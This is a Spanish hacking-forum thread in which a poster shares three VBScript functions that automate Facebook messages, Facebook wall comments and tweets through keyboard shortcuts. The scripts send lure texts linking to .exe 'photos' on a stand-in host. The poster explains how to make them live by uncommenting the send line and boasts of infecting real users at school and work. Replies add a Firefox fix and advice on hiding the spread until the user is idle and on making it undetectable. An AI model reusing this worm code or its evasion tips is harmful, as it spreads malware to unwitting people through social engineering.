Foro de elhacker.net

Hola a todos

Como algunos ya habréis visto, estoy retomando mis tiempos mozos de programación. Ando liado desarrollando virus, troyanos y gusanos. Hoy vengo a compartir 3 funciones de Spread que permitirán reproducir una infección vírica usando Facebook (2 métodos) y Twitter (1 método)

El funcionamiento es muy simple. Primero de todo se tienen que dar unas circunstancias para que el "spread" sea efectivo, he realizado pruebas con usuarios reales y me he quedado asombrado con la efectividad de éste "spread". El código se aprovecha de los atajos de teclado que hay en las web's de FB y TW. Eso significa que si cambian los atajos, la función dejará de funcionar... Empecemos con la primera:

Spread usando mensajes personales de Facebook

Primero de todo, os contaré las pulsaciones que ejecuta el script para que las podáis testear en vuestro propio FB, es muy fácil:

1. Entra en www.facebook.com
2. Inicia sesión en tu perfil
3. Pulsa la combinación de teclas: ALT+M
4. Pulsa una tecla (la letra C por ejemplo)
5. Pulsa Enter y Tabulador
6. Escribe un texto y pulsa Enter

Si lo has hecho bien, verás que has enviado un mensaje a un contacto de tu lista de amigos. Pues bien, el script automatiza todas esas acciones en el PC de la víctima:

Set WS = CreateObject("WScript.Shell")
call fb_msg_spread("holaa, te he etiquetado en esta foto http://www.servidor.com/mifoto.exe")
 
Function FB_MSG_Spread(X)
	Randomize
	C = Chr(Int(rnd*26)+97)
 
	WS.run "http://www.facebook.com"
	WScript.Sleep 5000
 
	WS.SendKeys "%m"
	WScript.Sleep 500
 
	For i = 1 to Int(rnd*5)+2
		WS.SendKeys C
		WScript.Sleep 500
		WS.SendKeys "{ENTER}"
	Next
 
	WScript.Sleep 500
	WS.SendKeys "{TAB}"
	WScript.Sleep 500
	WS.SendKeys X
	WScript.Sleep 500
	'WS.SendKeys "{ENTER}"
End Function

Copiad ese código TAL CUAL en un fichero de texto y lo guardáis como VBS. La última linea esta comentada, por lo que no os preocupéis, no se va a mandar ningún mensaje a ningún contacto vuestro.

Ahora ejecutad el fichero y mirar como se reproduce la secuencia de comandos. El script calcula una letra al azar y la utiliza para enviar el mensaje a varios contactos simultaneamente. Para utilizar éste código de forma real, quita el comentario de la última línea y ya tendrás un estupendo spread por Facebook.

(http://i.imgur.com/wZkbnpJ.png)

Spread usando noticias del muro de Facebook

Éste metodo es parecido al anterior, pero utiliza las teclas J y C para buscar una noticia al azar y enviar el comentario:

Set WS = CreateObject("WScript.Shell")
call fb_txt_spread("ei, creo que te han etiquetado sin tu permiso! http://www.servidor.com/lafoto.exe")
 
Function FB_TXT_Spread(X)
	Randomize
 
	WS.run "http://www.facebook.com"
	WScript.Sleep 5000
 
	For i = 1 to Int(rnd*5)+1
		WS.SendKeys "j"
		WScript.Sleep 800
	Next
 
	WS.SendKeys "c"
	WScript.Sleep 800
	WS.SendKeys X
	WScript.Sleep 500
	'WS.SendKeys "{ENTER}"
	WScript.Sleep 500
	WS.SendKeys "{TAB}"
	WScript.Sleep 500
	WS.SendKeys "{TAB}"
	WScript.Sleep 500
	WS.SendKeys "j"
End Function

De igual modo que en el ejemplo anterior, podéis ejecutar éste script ya que la tecla ENTER está comentada y no hay riesgo. Para utilizar el script en un entorno real, quitad el comentario.

(http://i.imgur.com/VxnTDBZ.png)

Spread usando un tweet en Twitter

Lo mismo que los anteriores casos, utilizando la tecla M para mandar un tweet:

Set WS = CreateObject("WScript.Shell")
call tw_txt_spread("Acabo de publicar un album de fotos http://www.servidor.com/photo_album.exe")
 
Function TW_TXT_Spread(X)
	Randomize
 
	WS.run "http://www.twitter.com"
	WScript.Sleep 6000
 
	WS.SendKeys "n"
	WScript.Sleep 800
	WS.SendKeys X
	WScript.Sleep 500
	WS.SendKeys "{TAB}"
	WScript.Sleep 500
	'WS.SendKeys "{ENTER}"
End Function

Podéis probar el código, ya que la tecla ENTER también está comentada.

(http://i.imgur.com/cCXakQ9.jpg)

---

Bueno, espero que os haya gustado y que haya quedado clara mi explicación. Insisto, los script que he puesto los podéis probar en vuestro PC, ya que la línea que envía el mensaje a los contactos está deshabilitada con el comentario, así que no hay riesgo.

Saludos!! :D

Buen code como siempre, ingenioso y sencillo. Ultimamente se explota mucho el potencial de vbs por lo que veo.

Saludos

Lo has probado? Te ha funcionado? Mañana lo probaré en otras maquinas con SO y web-browsers diferentes a ver si detecto algun bug.

Gracias! :D

PD: vbs tiene la facilidad de ser fácilmente programable y encriptable, obtienes grandes resultados con solo unos pocos bytes. Yo adoro VB6 y VBS

:D

He probado los dos de facebook Win7 con el Chrome y funcionan.Estoy impaciente por ver el cactus trojan :)

Jolín hace tiempos que no veia por aqui a Antrax, puff buenos tiempos en que andaba purgando web a ver que escribiay tutos, aún esta tu página me acuerdo que no la conseguia encontrar de las ultimas veces que buscaba, aún tengo algunos pdfs de tus tutos amigo.

Todo un lujo verte de nuevo por aqui, aunque yo más bien aprendi poco eheh me pase a Linux y esas cosillas eheh.

A ver si paso más por aqui a ver si pones material. ;D (droja de la buena ehehe)

Waaa explicanos mas   :o

HOLA!!!

Me parecio medio chapucero el codigo, aunque en su mayoria funcionan...

El de mensaje no funciona bien en firefox winxp.

el resto andan de diez, aunque podrias haber hecho algo mas en segundo plano.

Si queres tengo un codigo que funciona con winsocks en vbs y anda muy bien y tengo una tactica para hacer "FUD" casi cualquier codigo en VBS.

GRACIAS POR LEER!!!

El codigo es sencillo y "chapucero", evidentemente se puede implementar de formas más eficaces, ésto es solo una prueba de concepto. Yo le agregaría una función que compruebe las cookies locales para ver si el usuario está logeado en Facebook/Twitter y luego una función que detecte si el usuario está delante de la pantalla o no, por ejemplo comprobando la posición del Mouse a intervalos de 5 minutos, si el mouse no se mueve pues lanzar el spread para que nadie lo vea.

Insisto que lo he probado con varios usuarios del instituo y del trabajo. El gusano se expandió por la red en cuestión de horas. Tuve que eliminar el fichero de descarga para detener la infección.

Es un método un poco brusco y "chapucero", pero funciona que da miedo :D

genial  ;D , es increible que la gente sea tan ingenua de abrir las fotos.exe xD o o la foto.gif.exe

Amores, no habéis pensado en usar la API?....

Si necesitas ayuda para hacerla... yo te ayudo...

Para que el Spread Msg de Facebook sea funcional en Firefox deben poner

WS.SendKeys "+(%m)"

en vez de

WS.SendKeys "%m"

y aun sigue quedando funcional para firefox y chrome

HOLA!!!


APIS en VBS?

Si sabes como hacerlo te regalo un chocolate.

GRACIAS POR LEER!!!

Las APIS de facebook alertan al usuario sobre las acciones que se van a ejecutar bajo su cuenta. Cuando conectamos un juego del iphone/android al facebook siempre pregunta si le queremos dar acceso. Usar las APIS de facebook para propagar un gusano es un poco... como lo diría... poco efectivo xD

HOLA!!!

Ahhh las apis de Facebook, pense que hablaban de WINAPI

GRACIAS POR LEER!!!

El 90% de los virus por facebook son por API's... o por lo menos los que salen en las noticias de este foro, un video, un concurso, un juego... siempre picamos...

pero el resultado no es muy diferente se le envia a los "amigos" un enlace infectado ya sea por el chat o post .

Te quedó de lujo bro, no sabia esos atajos de teclado para Twitter y Facebook.  ;D

//Regards.

Las APIS de Facebook + javascript + vbs/vb6 = Spread de lujo... javascript se utilizaría para crear una extensión en chrome/firefox o que se yo, su utilidad radica en dar aceptar los diálogos...

Dulces Lunas!¡

el codigo es muy simple,pero efectivo gracias

Pero como puedes expandir esto?, :s

si es que unicamente se baja el fichero exe o vbs, eso no se ejecuta solo

Claro, por eso se llama "spread" y no "exploit".

Entiendo..

Eso falla a mi modo de verlo, porque hay mucha gente que ya ha aprendido la lección y desconfía de ejecutar cosas raras.

De todos modos, el código está genial, de hecho lo usaré para otros métodos de automatización de tareas interesantes :)

Grande Antrax!

Muy bueno el script , de lujo da todo

Lo unico malo es q el infectado se da cuenta de todo , osea se da cuenta que tas enviando un mensaje a tus amigos al azar , y fazil al ver eso formatee su maquina ... se puede usar este mismo metodo , pero que el usuario no vea nada ? como todo minimizado o algo?


PD: el spread de muro o noticia me funciona , pero no siempre , es depende tbm de que noticia tienen , tbm influye los anuncios de noticias que no se puede comentar , a mi de 6 intentos de muro me funciono 2 o 3

Pues tal y como está programado; no. El usuario lo verá todo, pero eso no es problema si lo implementas correctamente:

Añade una rutina que detecte el uso del equipo, cuando el equipo esté más de 5 minutos entonces lanza el spread por facebook/twitter, las ventanas se ejecutarán y en teoría nadie verá nada.

También puedes añadir una rutina de detección de cookies, para saber si el user esta auto-logged en facebook/twitter y poder lanzar el spread. Sobre el muro de noticias.. he visto que han actualizado el layout de facebook, es posible eso que comentas, que no en todas las noticias se puede postear... bueno, eso añado un poco más de "randomize" a la hora de hacer el spread. No le veo mucho problema.

Éste script es una especie de PoC, la base está montada, ahora solo falta que cada uno con su ingenio lo adapte, mejore y complete a su gusto.

Ánimo! :)

buen dia, la verdad soy muy nuevo en las areas profundas de la informatica. pero hay alguna forma de dar esas ordenes desde cmd sin hacer el vbs? :huh:

Increible! Que tienen de diferente vbs con vb6

Enviado desde mi camello mutante mediante Tapatalk

vb6 esta mas orientado a aplicaciones de escritorio con interfaz gráfica y vbs a realizar scripts en windows, muy sencillos.

aun asi tienen sintaxis parecida, no te llevara mucho aprenderlos

Hermoso source y muy ingenioso MadAntrax la verdad es que yo siempre eh admirado tus trabajos, saludos.